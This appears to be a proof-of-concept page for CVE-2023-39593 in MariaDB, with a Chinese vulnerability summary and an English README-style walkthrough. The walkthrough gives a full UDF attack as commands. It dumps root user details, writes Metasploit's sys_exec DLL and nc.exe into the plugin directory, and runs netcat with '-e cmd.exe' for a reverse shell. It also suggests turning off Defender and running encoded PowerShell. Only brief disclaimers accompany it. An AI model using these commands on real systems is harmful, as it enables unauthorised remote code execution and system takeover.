POC详情: 61ca83566df30528465fe1138cd32346d7200ae0

标题: MariaDB 安全漏洞 (CVE-2023-39593)
描述:MariaDB是MariaDB基金会的一套免费开源的数据库管理系统,也是一个采用Maria存储引擎的MySQL分支版本。 MariaDB 10.5版本存在安全漏洞,该漏洞源于sys_exec函数中的不安全权限,允许经过身份验证的攻击者以提升的权限执行任意命令。
Database authenticated code execution
Here's a GitHub README file for your project detailing the steps to reproduce this MariaDB UDF attack:


# MariaDB Authenticated Code execution

This guide provides detailed instructions to exploit a User-Defined Function (UDF) vulnerability in MariaDB on a remote server. These steps include downloading and executing malicious code on a vulnerable database system.

> **Warning:** This document is for educational purposes only. Unauthorized use of these techniques is illegal and unethical.

## Steps to Reproduce the Attack

### 1. Connect to MariaDB Remote Host

Use the following command to connect to the MySQL server:

mysql -h -u root -pPassw0rd!

### 2. Check MariaDB Version

To determine the version of MySQL running, execute:

select @@version;

### 3. List All Users

To see the current user logged in:

select user();

### 4. Dump All Information About the Root User

Retrieve all details related to the root user:

select * from mysql.user where user='root';

### 5. Check User Privileges

Determine what privileges the current user has:

show grants;

### 6. Check the Architecture of the System

Determine if the system architecture is vulnerable to UDF:

select @@version_compile_os, @@version_compile_machine;

### 7. Check the Plugin Directory

Identify the plugin directory where UDF files can be uploaded:

select @@plugin_dir;

### 8. Copy the 32-bit DLL

Copy the 32-bit DLL from Metasploit’s exploit directory:

ls /usr/share/metasploit-framework/data/exploits/mysql/
cp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.dll udf.dll

### 9. Convert the DLL to Base64 Format

Encode the `udf.dll` file in base64 format:

cat udf.dll | base64 | tr -d '\n' > udf.base64

### 10. Transfer the DLL to the MySQL Server

Copy the base64 value from `udf.base64` and transfer it into the MySQL server:

Open `udf.base64` in a text editor:

leafpad udf.base64

In MariaDB, run:

select from_base64("base64 value") into dumpfile 'C:\\Program Files\\MariaDB 10.4\\lib\\plugin\\udf.dll';

Alternatively, use the following path if necessary:

C:\Program Files\MariaDB 11.1\lib\plugin\

### 11. Load the UDF Function into MariaDB

Execute the following command in MariaDB to create a new function:

create function sys_exec returns int soname 'udf.dll';

> **Note:** You can also use `sys_eval`, `sys_get`, `do_system`, or `sys_bineval`. Ensure you use `int` and not `into`.

### 12. Verify the UDF Installation

Check if the UDF function was successfully installed:

select * from mysql.func;

### 13. Prepare the Netcat Binary

Copy the Netcat executable to your local directory and encode it in base64:

cp /usr/share/windows-binaries/nc.exe .
cat nc.exe | base64 | tr -d '\n' > nc.base64

### 14. Transfer Netcat to the MariaDB Server

Open `nc.base64` in a text editor:

leafpad nc.base64

Then, in MySQL:

select from_base64("base64valueofNc.exe") into dumpfile 'C:\\Program Files\\MariaDB 10.4\\lib\\plugin\\nc.exe';

Alternatively, you can directly upload it using:

mysql -u root -p -h < nc.base64

### 15. Execute Netcat for a Reverse Shell

Turn on Netcat listener on port 443:

sudo nc -nlvp 443

Execute Netcat on the remote server for a reverse shell:

select sys_exec('C:\\Program Files\\MariaDB 10.4\\lib\\plugin\\nc.exe 443 -e cmd.exe');

> **Note:** This step may be blocked by Windows Defender or other antivirus software. Consider using PowerShell encoded commands (`powershellbase64`) and ensure Defender is turned off.

### 16. Execute PowerShell Commands

Execute a PowerShell command using base64 encoding:

select sys_exec('powershellbase64');

> **NOTE:** You may gain NT AUTHORITY SYSTEM privileges in many cases.

### Additional Information

- **Drop Function:** To remove any created UDF functions:

  drop function sys_get;

- **Check Local Infile:** Verify if local write is enabled:

  show variables like 'local_infile';

- **Find Users with Insert Privilege:** Identify which users have the insert privilege:

  use mysql;
  select user from user where insert_priv='Y' and Host='%';


**Disclaimer:** This document is intended for educational purposes and security research only. Misuse of this information can result in criminal charges and severe legal penalties. Always obtain permission from the relevant authorities before testing any vulnerabilities on a network or system.

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